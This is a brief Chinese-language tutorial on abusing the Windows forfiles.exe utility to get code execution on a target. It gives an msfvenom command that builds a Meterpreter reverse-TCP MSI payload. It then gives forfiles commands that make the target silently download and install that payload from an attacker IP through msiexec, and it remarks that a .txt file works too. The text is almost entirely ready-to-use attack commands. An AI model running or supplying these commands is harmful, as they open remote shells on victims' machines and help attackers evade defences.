简介
Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用
已添加环境变量,路径如下:
C:\Windows\System32\forfiles.exe
C:\Windows\SysWOW64\forfiles.exe
实际使用
设定监听如下:
此处依旧使用msi的payload即可
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.122.1 lport=2021 -f msi > 2021.msi
目标终端执行如下:
forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i http://192.168.122.1/2021.msi"
此处txt也是可以上线的!
forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i http://192.168.122.1/2021.txt